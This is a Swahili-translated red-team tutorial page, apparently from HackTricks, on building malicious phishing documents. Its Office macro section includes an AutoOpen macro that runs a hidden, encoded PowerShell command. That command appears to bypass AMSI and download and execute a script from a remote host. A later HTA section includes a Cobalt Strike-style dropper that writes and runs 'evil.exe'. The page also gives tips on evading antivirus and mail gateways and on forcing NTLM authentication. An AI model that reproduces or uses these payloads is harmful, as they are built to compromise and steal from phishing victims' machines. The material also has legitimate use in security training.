Phishing Files & Documents

Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Nyaraka za Ofisi

Microsoft Word hufanya uthibitishaji wa data ya faili kabla ya kufungua faili. Uthibitishaji wa data hufanywa kwa njia ya kutambua muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa kuna kosa lolote wakati wa kutambua muundo wa data, faili inayochambuliwa haitafunguliwa.

Kawaida, faili za Word zinazojumuisha macros hutumia kielezo cha .docm. Walakini, inawezekana kubadilisha jina la faili kwa kubadilisha kielezo cha faili na bado kudumisha uwezo wao wa kutekeleza macros. Kwa mfano, faili ya RTF haisaidii macros, kwa kubuni, lakini faili ya DOCM iliyebadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itaweza kutekeleza macros. Mifumo na taratibu sawa inatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.).

Unaweza kutumia amri ifuatayo kuangalia ni vifaa vipi vitakavyotekelezwa na baadhi ya programu za Ofisi:

assoc | findstr /i "word excel powerp"

Upakiaji wa Picha za Nje

Nenda: Chomeka --> Sehemu za Haraka --> Uga Jamii: Viungo na Marejeleo, Jina la Uga: includePicture, na Jina la Faili au URL: http://<ip>/chochote

Mlango Nyuma wa Macros

Inawezekana kutumia macros kutekeleza nambari isiyojulikana kutoka kwenye hati.

Vipengele vya Kiotomatiki

Kadri wanavyokuwa vya kawaida, ndivyo inavyoweza kugunduliwa na AV.

  • AutoOpen()

  • Document_Open()

Mifano ya Nambari za Macros

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Ondoa metadata kwa mkono

Nenda kwa Faili > Maelezo > Ukaguzi wa Hati > Ukaguzi wa Hati, ambayo italeta Mchunguzi wa Hati. Bonyeza Kagua kisha Ondoa Yote karibu na Mali za Hati na Taarifa Binafsi.

Uzidi wa Hati

Ukapomaliza, chagua Aina ya Hifadhi kwenye menyu ya kunjua, badilisha muundo kutoka .docx hadi Neno 97-2003 .doc. Fanya hivi kwa sababu huwezi kuhifadhi macro ndani ya .docx na kuna unyanyapaa kuhusu uzidi wa macro ya .docm (k.m. ishara ya kidole ina alama kubwa ya ! na baadhi ya lango la mtandao/barua pepe linazuia kabisa). Hivyo, uzidi wa zamani wa .doc ni muafaka zaidi.

Wazalishaji wa Macro Zenye Nia Mbaya

Faili za HTA

HTA ni programu ya Windows ambayo inachanganya HTML na lugha za maandishi (kama VBScript na JScript). Inazalisha kiolesura cha mtumiaji na inatekelezwa kama programu "iliyothibitishwa kabisa", bila vikwazo vya mfano wa usalama wa kivinjari.

HTA inatekelezwa kwa kutumia mshta.exe, ambayo kwa kawaida inasakinishwa pamoja na Internet Explorer, ikifanya mshta kuwa tegemezi kwa IE. Kwa hivyo, ikiwa imeondolewa, HTAs haitaweza kutekelezwa.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Kulazimisha Uthibitisho wa NTLM

Kuna njia kadhaa za kulazimisha uthibitisho wa NTLM "kijijini", kwa mfano, unaweza kuongeza picha zisizoonekana kwenye barua pepe au HTML ambayo mtumiaji atafikia (hata HTTP MitM?). Au tuma mhanga anwani ya faili ambazo zitafanya uthibitisho tu kwa kufungua folda.

Angalia mawazo haya na zaidi kwenye kurasa zifuatazo:

pageForce NTLM Privileged AuthenticationpagePlaces to steal NTLM creds

NTLM Relay

Usisahau kwamba huwezi tu kuiba hash au uthibitisho bali pia kufanya mashambulizi ya NTLM relay:

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Last updated